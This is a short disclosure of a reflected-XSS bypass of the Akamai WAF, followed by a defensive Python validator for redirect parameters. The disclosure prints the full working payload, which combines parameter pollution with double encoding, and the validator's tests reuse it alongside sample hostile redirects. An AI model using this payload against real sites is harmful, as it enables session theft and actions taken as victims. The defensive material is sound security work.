A bypass for reflected XSS protection in the Akamai WAF, combining HTTP Parameter Pollution (HPP) with double URL encoding, was discovered. The request used is /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529. The ReturnUrl parameter is supplied twice: the first value is a javascript: URL and the second is a double-URL-encoded string that, after two percent-decoding passes, reads alert(document.domain). The bypass works because the WAF and the application behind it differ in which of the repeated values they act on and in how many times they percent-decode it, so the script URL reaches the reflection point and executes in the victim's browser, with the usual consequences of reflected XSS (session theft, actions performed as the user, content injection).
Original tweet: https://twitter.com/HackingTeam777/status/1853688099986940366
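The two tricks in this payload, a repeated parameter and nested percent-encoding, are exactly what a redirect-target validator must neutralise before it decides anything. The following is an added example, not code from the tweet or from Akamai: a Python validator for a ReturnUrl-style parameter that rejects duplicated parameters outright, fully decodes the value before inspecting it (so %2561 and %61 are judged the same), and then only accepts a site-relative path. The function and parameter names, the rejection reasons and the sample query strings are my own constructions; the first sample query is the one quoted above.

```python
from typing import Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

MAX_DECODE_PASSES = 3   # enough to unwrap double (and triple) percent-encoding
SAFE_DEFAULT = "/"      # where to send the user when the parameter is rejected

# Constructed sample: the query string from the report (first value is a
# javascript: URL, second is alert(document.domain) double-encoded).
REPORTED_QUERY = (
    "ReturnUrl=javascript:1&ReturnUrl="
    "%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e"
    "%2574%252e%2564%256f%256d%2561%2569%256e%2529"
)


def normalize(value: str) -> str:
    """Percent-decode repeatedly until the value stops changing.

    A single unquote() is what most frameworks do; an attacker who encodes
    twice gets a value the WAF never saw in its decoded form. Decoding to a
    fixed point removes that ambiguity before any check runs.
    """
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def validate_return_url(query: str, param: str = "ReturnUrl") -> Tuple[str, Optional[str]]:
    """Return (redirect_target, rejection_reason).

    On any rejection the target is SAFE_DEFAULT and the reason is a short
    string suitable for logging; on acceptance the reason is None.
    """
    pairs = parse_qsl(query, keep_blank_values=True)      # one decode pass here
    values = [v for k, v in pairs if k == param]

    if not values:
        return SAFE_DEFAULT, None                          # absent is fine: default
    if len(values) > 1:
        # HTTP Parameter Pollution: never pick "first" or "last", refuse both.
        return SAFE_DEFAULT, "duplicate parameter"

    once_decoded = values[0]
    value = normalize(once_decoded)
    if value != once_decoded:
        # Anything still percent-encoded after the framework's own decode is
        # a strong signal of an evasion attempt; flag it rather than guess.
        return SAFE_DEFAULT, "nested encoding"

    if any(ch <= " " or ch == "\x7f" for ch in value):
        return SAFE_DEFAULT, "control character"

    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        # Catches javascript:, data:, https://evil and protocol-relative //evil
        return SAFE_DEFAULT, "scheme or host present"

    # Browsers treat "/\evil.example" like "//evil.example"; urlsplit does not.
    if not value.startswith("/") or value[1:2] in ("/", "\\"):
        return SAFE_DEFAULT, "not a site-relative path"

    return value, None


if __name__ == "__main__":
    for q in (REPORTED_QUERY,
              "ReturnUrl=javascript:1",
              "ReturnUrl=%2561%256c%2565%2572%2574%2528%2531%2529",
              "ReturnUrl=//evil.example/",
              "ReturnUrl=/%5Cevil.example/",
              "ReturnUrl=%2Faccount%2Fsettings%3Ftab%3D1"):
        target, reason = validate_return_url(q)
        print(f"{q[:48]:<48} -> {target!r}  {reason or 'accepted'}")
```

The rejection reason is worth emitting to the application log: a spike in "nested encoding" or "duplicate parameter" on a redirect parameter is a cheap, WAF-independent detection signal for exactly this kind of probing, and it does not depend on recognising any particular script string.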